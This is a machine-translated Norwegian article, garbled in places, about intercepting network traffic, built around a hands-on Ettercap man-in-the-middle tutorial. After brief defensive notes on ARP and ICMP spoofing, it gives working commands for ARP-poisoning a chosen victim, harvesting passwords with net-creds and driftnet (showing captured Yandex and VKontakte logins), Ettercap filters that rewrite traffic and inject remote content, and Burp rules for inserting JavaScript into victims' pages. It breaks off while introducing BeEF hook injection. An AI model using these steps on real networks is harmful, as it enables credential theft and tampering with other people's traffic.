Hackere bruker for å omdirigere trafikk. Måter for hackerangrep. Dataspoofing med Burp

Metoder for å avskjære nettverkstrafikk

Å lytte til nettverket ved hjelp av nettverksanalysatorprogrammer er det første, mest på en enkel måte dataavskjæring.

For å beskytte mot nettverksavlytting, søk spesielle programmer, for eksempel AntiSniff, som er i stand til å oppdage datamaskiner på nettverket som lytter til nettverkstrafikk.

For å løse problemene deres bruker anti-sniffer-programmer et spesielt tegn på tilstedeværelsen av lytteenheter på nettverket - nettverkskortet til snifferdatamaskinen må være i en spesiell lyttemodus. Når de er i lyttemodus, reagerer nettverksbaserte datamaskiner på en spesiell måte på IP-datagrammer som sendes til verten som testes. For eksempel behandler lyttende verter vanligvis all innkommende trafikk, ikke bare datagrammer som sendes til vertsadressen. Det er andre tegn på mistenkelig vertsatferd som AntiSniff kan gjenkjenne.

Utvilsomt er lytting veldig nyttig fra en angripers synspunkt, siden det lar deg få mye nyttig informasjon - passord som overføres over nettverket, nettverksdatamaskinadresser, konfidensielle data, brev og så videre. Enkel avlytting forhindrer imidlertid at en hacker forstyrrer nettverkskommunikasjonen mellom to verter for å endre og korrupte data. For å løse dette problemet kreves mer sofistikert teknologi.

For å avskjære og sløyfe prosessen med nettverkskommunikasjon mellom to verter A og B, kan en angriper erstatte IP-adressene til de samhandlende vertene med sin egen IP-adresse ved å sende falske ARP-meldinger (Address Resolution Protocol) til vertene A og B. .

Ris. 1 falske ARP-forespørsler

La oss se hvordan en hacker kan bruke ARP-protokollen til å avskjære nettverkskommunikasjonen mellom vertene A og B.

For å avskjære nettverkstrafikk mellom vertene A og B, tvinger en hacker sin IP-adresse på disse vertene slik at A og B bruker denne falske IP-adressen når de utveksler meldinger. For å pålegge IP-adressen deres, utfører en hacker følgende operasjoner.

• En angriper bestemmer MAC-adressene til vertene A og B, for eksempel ved å bruke kommandoen nbtstat fra W2RK-pakken.
• Angriperen sender meldinger til de identifiserte MAC-adressene til vertene A og B, som er forfalskede ARP-svar på forespørsler om å løse IP-adressene til verter til MAC-adressene til datamaskiner. Host A får beskjed om at vert Bs IP-adresse samsvarer med MAC-adressen til angriperens datamaskin; vert B får beskjed om at vert A sin IP-adresse også samsvarer med angriperens datamaskins MAC-adresse.
• Verter A og B legger inn de mottatte MAC-adressene i ARP-cachene sine og bruker dem deretter til å sende meldinger til hverandre. Siden IP-adressene A og B tilsvarer MAC-adressen til angriperens datamaskin, kommuniserer vertene A og B, uvitende om noe, gjennom en mellommann som er i stand til å gjøre hva de vil med meldingene deres.

For å beskytte mot slike angrep må nettverksadministratorer vedlikeholde en database med en kartleggingstabell mellom MAC-adresser og IP-adresser til nettverksdatamaskinene deres.

På UNIX-nettverk kan denne typen spoofing ARP-angrep implementeres ved å bruke systemets nettverkstrafikkovervåkings- og kontrollverktøy, for eksempel arpredirect. Dessverre ser det ikke ut til at slike pålitelige verktøy er implementert i Windows-nettverk. For eksempel, på NTsecurity-siden, kan du laste ned GrabitAII-verktøyet, som presenteres som et verktøy for å omdirigere trafikk mellom nettverksverter. En elementær ytelsessjekk av GrabitAII-verktøyet viser imidlertid at det fortsatt er langt fra fullstendig suksess med å implementere funksjonene.

For å avskjære nettverkstrafikk kan en angriper erstatte den virkelige IP-adressen til en nettverksruter med sin egen IP-adresse, for eksempel ved å bruke falske ICMP Redirect-meldinger. I følge RFC-1122 skal vert A tolke den mottatte omdirigeringsmeldingen som et svar på et datagram sendt til en annen vert, for eksempel B. Vert A bestemmer sine handlinger på omdirigeringsmeldingen basert på innholdet i den mottatte omdirigeringsmeldingen, og hvis Redirect er satt til å omdirigere datagrammer fra A til B på en ny rute, er det akkurat det vert A vil gjøre.

Ris. 2 Falsk ruting

For å utføre falsk ruting, må en angriper vite noen detaljer om organisasjonen lokalt nettverk, hvor vert A befinner seg, spesielt IP-adressen til ruteren som trafikk sendes gjennom fra vert A til B. Ved å vite dette vil angriperen danne et IP-datagram der kildens IP-adresse er definert som IP-adressen til ruteren, og mottakeren er spesifisert vert A. Også inkludert i datagrammet er en ICMP Redirect-melding med den nye ruterens adressefelt satt til IP-adressen til angriperens datamaskin. Etter å ha mottatt en slik melding, vil vert A sende alle meldinger til IP-adressen til angriperens datamaskin.

For å beskytte mot et slikt angrep, bør du deaktivere (for eksempel ved å bruke en brannmur) på vert A behandlingen av ICMP Redirect-meldinger, og tracert-kommandoen (i Unix er dette tracerout-kommandoen) kan avsløre IP-adressen til angriperens datamaskin . Disse verktøyene er i stand til å finne en ekstra rute som dukket opp på det lokale nettverket, ikke gitt under installasjonen, hvis, selvfølgelig, nettverksadministratoren er årvåken.

Eksemplene ovenfor på avskjæringer (som langt fra er begrenset til angripere) overbeviser om behovet for å beskytte data som overføres over nettverket hvis dataene inneholder konfidensiell informasjon. Den eneste metoden for beskyttelse mot avskjæring av nettverkstrafikk er bruk av programmer som implementerer kryptografiske algoritmer og krypteringsprotokoller og forhindrer avsløring og erstatning av hemmelig informasjon. For å løse slike problemer gir kryptografi midler for kryptering, signering og autentisering av meldinger som sendes over sikre protokoller.

Den praktiske implementeringen av alle kryptografiske metoder for å beskytte informasjonsutveksling er levert av VPN-nettverk(Virtuelt privat nettverk - virtuelle private nettverk).

TCP-tilkoblingsavskjæring

Det mest sofistikerte nebør betraktes som TCP-tilkoblingskapring (TCP-kapring), når en hacker, ved å generere og sende TCP-pakker til den angrepne verten, avbryter den nåværende kommunikasjonsøkten med verten. Videre, ved å bruke egenskapene til TCP-protokollen for å gjenopprette en avbrutt TCP-forbindelse, avskjærer hackeren den avbrutte kommunikasjonsøkten og fortsetter den i stedet for den frakoblede klienten.

Flere effektive verktøy er laget for å utføre TCP-kapringangrep, men de er alle implementert for Unix-plattformen, og disse verktøyene er kun tilgjengelige på nettsider i kildekodeform. Dermed er det ikke mye bruk for angrep ved å avskjære en TCP-forbindelse.

TCP (Transmission Control Protocol) er en av de grunnleggende transportprotokollene. OSI-lag, som lar deg etablere logiske forbindelser over en virtuell kommunikasjonskanal. Pakker sendes og mottas over denne kanalen med registrering av sekvensen deres, pakkeflyten kontrolleres, retransmisjonen av forvrengte pakker organiseres, og på slutten av økten brytes kommunikasjonskanalen. TCP er den eneste protokollen grunnleggende protokoll fra TCP/IP-familien, som har et avansert meldings- og.

Oversikt over Software Packet Sniffers

Alle programvaresniffere kan grovt deles inn i to kategorier: sniffere som støtter oppstart fra kommandolinje, og sniffere med et grafisk grensesnitt. Samtidig merker vi at det finnes sniffere som kombinerer begge disse funksjonene. I tillegg skiller sniffere seg fra hverandre i protokollene de støtter, dybden på analyse av avlyttede pakker, muligheten til å konfigurere filtre og muligheten for kompatibilitet med andre programmer.

Vanligvis vinduet til enhver sniffer med GUI består av tre områder. Den første viser et sammendrag av de fangede pakkene. Vanligvis viser dette området et minimum av felt, nemlig: pakkefangsttid; IP-adresser til avsender og mottaker av pakken; Pakkekilde- og destinasjons-MAC-adresser, kilde- og destinasjonsportadresser; protokolltype (nettverk, transport eller applikasjonslag); noen sammendragsinformasjon om de avlyttede dataene. Det andre området viser statistisk informasjon om den individuelle valgte pakken, og til slutt presenterer det tredje området pakken i heksadesimal eller tegnform - ASCII.

Nesten alle pakkesniffere tillater analyse av dekodede pakker (det er grunnen til at pakkesniffer også kalles pakkeanalysatorer, eller protokollanalysatorer). Snifferen distribuerer de avlyttede pakkene etter lag og protokoller. Noen pakkeanalysatorer er i stand til å gjenkjenne protokollen og vise den fangede informasjonen. Denne typen informasjon vises vanligvis i det andre området av sniffervinduet. For eksempel kan enhver sniffer gjenkjenne TCP-protokollen, og avanserte sniffere kan bestemme hvilken applikasjon som genererte denne trafikken. De fleste protokollanalysatorer gjenkjenner over 500 forskjellige protokoller og kan beskrive og dekode dem ved navn. Jo mer informasjon snifferen klarer å dekode og presentere på skjermen, jo mindre trenger du å dekode manuelt.

Et problem som pakkesniffere kan støte på er ikke å kunne identifisere en protokoll riktig ved å bruke en annen port enn standardporten. For å forbedre sikkerheten kan for eksempel noen velkjente programmer konfigureres til å bruke andre porter enn standardportene. Så i stedet for den tradisjonelle porten 80 reservert for webserveren, gitt server kan tvinges til å rekonfigurere på port 8088 eller en hvilken som helst annen. Noen pakkeanalysatorer i denne situasjonen er ikke i stand til å bestemme protokollen riktig og viser kun informasjon om protokollen på lavere nivå (TCP eller UDP).

Det finnes programvaresniffere som følger med programvareanalysemoduler som plug-ins eller innebygde moduler som lar deg lage rapporter med nyttig analytisk informasjon om avlyttet trafikk.

Et annet karakteristisk trekk ved de fleste programvarepakkesniffere er muligheten til å konfigurere filtre før og etter at trafikk er fanget opp. Filtre skiller visse pakker fra den generelle trafikken i henhold til et gitt kriterium, noe som lar deg kvitte deg med unødvendig informasjon når du analyserer trafikk.

Ettercap Alternativer

Ettercap er det mest populære mann-i-midten-angrepsprogrammet, men er det det beste? Gjennom hele manualen vil du se at Ettercap nesten aldri brukes alene, at et eller annet program alltid er på linje med det i en trafikkbehandlingskjede. Kanskje gir dette fleksibilitet, generelt sett er denne tilnærmingen kjernen i UNIX - ett program utfører én oppgave, og sluttbrukeren kombinerer ulike programmer for å oppnå ønsket resultat. Med denne tilnærmingen er programkoden lettere å vedlikeholde; slike "klosser" i miniatyr kan brukes til å bygge et system av enhver kompleksitet og fleksibilitet. Likevel er det ikke veldig praktisk å ha fem åpne konsoller med forskjellige oppgaver, hvor arbeidet med hvilke programmer er rettet mot å oppnå ett enkelt resultat, det er bare vanskeligere, det er en sjanse for å gjøre en feil på et tidspunkt, og hele det konfigurerte systemet vil gå på tomgang.

Net-Creds snuser:

• Besøkte nettadresser
• sendte POST-forespørsler
• pålogginger/passord fra HTTP-skjemaer
• pålogginger/passord for grunnleggende HTTP-autentisering
• HTTP-oppslag
• FTP-pålogginger/passord
• IRC-pålogginger/passord
• POP-pålogginger/passord
• IMAP-pålogginger/passord
• Telnet-pålogginger/passord
• SMTP-pålogginger/passord
• SNMP-fellesskapsstreng
• alle støttede NTLMv1/v2-protokoller som HTTP, SMB, LDAP, etc.
• Kerberos

Et godt utvalg av avlyttede bilder, og drivgarn er enklere i denne forbindelse - det viser kun avlyttede bilder.

Bytt maskinen til videresendingsmodus.

ekko "1"> /proc/sys/net/ipv4/ip_forward

Vi starter Ettercap med et grafisk grensesnitt ( -G):

Ettercap-G

Velg nå verter, den har et underavsnitt Skann etter verter. Etter at skanningen er fullført, velg vertsliste:

Som Mål 1 velg ruter ( Legg til mål 1), som Mål 2 velg enheten du vil angripe ( Legg til mål 2).

Men her kan det første haken oppstå, spesielt hvis det er mange verter. I forskjellige instruksjoner, inkludert videoen presentert ovenfor, klatrer forfatterne inn i målmaskinen (av en eller annen grunn har alle Windows der) og bruker kommandoen til å se på IP-en til denne maskinen på det lokale nettverket. Enig, dette alternativet er uakseptabelt for reelle forhold.

Hvis du skanner med , kan du få noen Ytterligere informasjon om verter, mer presist, om produsenten av nettverkskortet:

nmap -sn 192.168.1.0/24

Hvis dataene fortsatt ikke er nok, kan du gjøre en skanning med definisjonen av operativsystemet:

nmap -O 192.168.1.0/24

Som du kan se, viste det seg at maskinen med IP 192.168.1.33 var Windows, hvis dette ikke er et tegn ovenfra, hva er det så? 😉 lol

Det er det vi legger til som det andre målet.

La oss nå gå videre til menyelementet. Mitm. Der velg ARP-forgiftning... Merk av i boksen Sniff eksterne tilkoblinger.

Vi begynner å høste, i ett vindu lanserer vi

Netto kreditter

i en annen (begge programmer kan kjøres uten alternativer)

drivgarn

Datainnsamlingen startet umiddelbart.

På høyre side har drivnett åpnet et annet vindu som viser tatt bilder. I net-creds-vinduet ser vi besøkte nettsteder og oppfangede passord:

1.2 Ettercap + Burp Suite

3. Se data (besøkte nettsteder og registrerte passord) i Ettercap

På menyen utsikt vi har faner tilgjengelig Tilkoblinger Og profiler. Du kan også merke av i boksen Løs IP-adresser(oversett IP-adresser). Forbindelser er selvfølgelig forbindelser. Ettercap samler inn minneprofiler for hver vert den oppdager. Der samles brukere og passord. I dette tilfellet er profiler med registrerte kontodata (passord) merket med et kryss:

Ikke stol for mye på profiler - for eksempel er avlyttede pålogginger og passord for FTP og andre tjenester merket, som programmet utvetydig kan tolke informasjonen som mottas som legitimasjon. Dette inkluderer for eksempel ikke grunnleggende autentiseringsdata, innlagte pålogginger og passord i nettskjemaer.

I Connections er de mest lovende dataene merket med en stjerne:

Du kan dobbeltklikke på disse oppføringene for å se detaljene:

For ikke å søke etter disse stjernene i hele listen, kan du sortere etter dette feltet og alle vil være øverst eller nederst:

Fanget grunnleggende autentisering:

Påloggingspassord for Yandex (uthevet nedenfor):

Dette er de avlyttede legitimasjonene for Vkontakte:

Dessuten er de mest interessante dataene samlet i den nedre konsollen:

Hvis du vil lagre resultatene av programmet, bruk disse alternativene (spesifiser nøklene når du starter Ettercap:

Loggingsalternativer: -w, --write<файл>skrive innfangede data til pcapfile<файл>-L, --log<логфайл>skriv all trafikk til denne<логфайл>-l, --logg info<логфайл>skriv kun passiv informasjon til denne<логфайл>-m, --log-melding<логфайл>skriv alle meldinger til denne<логфайл>-c, --compress bruk gzip-komprimering for loggfiler

4. Datasubstitusjon i farten i Ettercap

4.1 Bruk av tilpassede Ettercap-filtre

Merk: I all min testing fungerte ikke Ettercap-filtrene. Det er vanskelig å forstå om det er i hendene, i maskinvarefunksjonene eller i en feil i selve programmet ... Men for versjon 0.8.2 (den siste for øyeblikket) er det en feilrapport om problemer med filtre. Generelt sett, etter feilrapportene og foraene, faller filtrene ofte av, eller fungerer ikke i det hele tatt på lenge. Det er en gren som ble endret for 5 måneder siden https://github.com/Ettercap/ettercap/tree/filter-improvements, dvs. filterforbedringer (med filterforbedringer). Et bredt utvalg av tester ble gjort for denne grenen og for versjonen fra depotet ble forskjellige filtre testet under forskjellige forhold, mye tid ble brukt, men det ble ikke noe resultat. Forresten, for å installere versjonen av filterforbedringer i Kali Linux, må du gjøre dette:

sudo apt-get remove ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libncurses5-dev libncurses5-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ cmPDadir_DOCS build_cd =På ../ gjør sudo make install

Generelt, hvis filtrene dine ikke fungerer, er du ikke alene. I instruksjonene for Ettercap kan jeg ikke hoppe over temaet filtre, så de vil uansett bli vurdert.

Så langt har vi brukt Ettercap for ARP-spoofing. Dette er en veldig overfladisk applikasjon. Takket være egendefinerte filtre kan vi gripe inn og endre trafikk på farten. Filtre må finnes i separate filer og må kompileres med Etterfilter-programmet før bruk. Selv om dokumentasjonen som koblingen er gitt til ser ut til å være kort, men kombinert med eksemplene nedenfor, vil den tillate deg å skrive ganske interessante filtre.

La oss lage vårt første filter, det vil erstatte alle bilder med dette:

I en fil kalt img_replacer.filter kopi:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( replace("Accept-Encoding", "Accept-Rubbish!"); # merk: erstatningsstrengen har samme lengde som den originale msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter kjørt.\n"); )

Kompiler filen:

Etterfilter img_erstatter.filter -o img_erstatter.ef

Samlingsresultater:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 protokolltabeller lastet inn: DEKODEDE DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 konstanter lastet: VRRP OSPF GRE UDP TCP ESP ICMP6 kilde PPP IP PP 6 kilde "img_replacer.filter" ferdig. Utfolding av meta-treet ferdig. Konvertering av etiketter til reelle forskyvninger utført. Skrive utdata til "img_replacer.ef" ferdig. -> Skript kodet inn i 18 instruksjoner.

Nøkkel -F ber programmet laste inn filteret fra filen som følger nøkkelen. Etter kompilering er navnet på vår nye fil med filteret img_replacer.ef, så kommandoen blir:

Ettercap -G -F img_replacer.ef

Merk A: Når du overvåker nettrafikk, kan pakkene du ser være i kodet form. Til effektivt arbeid filtre, trenger Ettercap trafikk i skjemaet ren tekst. I følge noen observasjoner er typen koding som nettsider bruker "Accept-Encoding: gzip, deflate"

Nedenfor er et filter som overskriver kodingen, og tvinger kommunikasjon i form av ren tekst:

If (ip.proto == TCP && tcp.dst == 80) (if (search(DATA.data, "gzip")) ( replace("gzip", " "); # merk: fire mellomrom i meldingsstrengen til replace ("whiteed out gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # note: syv mellomrom i erstatningsstrengen msg("whiteed out deflate\n"); ) )

Syntaksen for å skrive filtre er beskrevet i detalj, og deretter noen flere eksempler:

# erstatte tekst i pakke: if (ip.proto == TCP && søk(DATA.data, "lol"))( replace("lol", "smh"); msg("filter kjørte"); ) # vis melding hvis tcp-porten er 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH-pakke\n"); ) ) # logg all telnet-trafikk , kjør også ./program per pakke if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile.log ") ; exec("./program"); ​​​​) ) # logg all trafikk unntatt http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log(DATA.data , "./logfile.log"); ) # noen pakkenyttelastoperasjoner hvis (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = "modifisert"; DATA .data + 20 = 0x4445; ) # slipp alle pakker som inneholder "ettercap" if (search(DECODED.data, "ettercap")) ( msg("noen snakker om oss...\n"); drop( ); kill( ); ) # skriv dekrypterte ssh-pakker som samsvarer med regulært uttrykk if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # killing packs if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Dataspoofing med Burp

Vi lanserer Ettercap og Burp som beskrevet i avsnitt 1.2 eller i avsnitt 2.2.

I Burp gå til Proxy -> Alternativer. Vi finner der Match og erstatt. Klikk Legg til for å legge til en ny regel.

• Forespørselsoverskrift er forespørselsoverskriften
• forespørselsorgan- forespørselsorgan
• svaroverskrift- svarhode
• responskropp- responskropp
• Be om paramnavn- Navn på spørringsparameter
• Be om parameterverdi- Be om parameterverdi
• Be om første linje- Første linje i spørringen

Hvis du trenger å endre dataene som overføres med GET-metoden, gjelder dette for overskriftene.

I HTML-markering er det også noe som heter head (head tag). De som er nevnt ovenfor har ingenting med denne overskriften å gjøre. Litt høyere sies det om pakkehoder. Hvis du ønsker å endre innholdet HTML-sider, så bør du alltid velge Response body i stedet for Request header, selv om du skal endre innholdet i head-taggen (for eksempel tittelen).

Hvis du ikke er kjent med vanlig uttrykk, da er det i prinsippet greit: HTML tilgir mye, og det det ikke forstår, ignorerer det rett og slett - du kan bruke det. Hvis du vet hvordan du bruker regulære uttrykk, så respekterer jeg deg.)))

La oss for eksempel lage en ny regel, endre forespørselsoverskriften til svartekst. I selve regelen vil vi endre

Merk av i boksen Regex-kamp.

Nå på alle nettsteder (uten HTTPS) i stedet for tittelen vil det være Ingen tittel:

Sett inn en vilkårlig linje etter body-taggen (det vil være den første linjen i teksten). Forespørselshode endres til Svartekst. Vi forandrer oss

Merk av i boksen Regex-kamp.

I øvre høyre hjørne (avhengig av layout) vises inskripsjonen "Jeg er kul!". Du kan sette inn CSS, JavaScript-kode, hvilken som helst tekst - hva som helst. Du kan generelt slette alt fra siden, og deretter fylle den med ditt eget innhold – alt avhenger av fantasien din.

Det var en ide om å endre hvert skjema litt slik at dataene sendes til den opprinnelige serveren og til angriperens server (implementer multi submit for hvert skjema). Men etter å ha begrunnet at hvis de overførte dataene ikke er kryptert og vi har tilgang til dem, så ser vi det uansett, vi trenger ikke å sende dem til noen server. Likevel, hvis noen trenger det, et virkelig fungerende eksempel på å sende data fra ett skjema til flere servere samtidig.

5. BeEF-tilkobling

For å begynne å bruke BeEF-funksjonene, må vi legge inn en JavaScript-fil i HTML-en, vanligvis en linje som: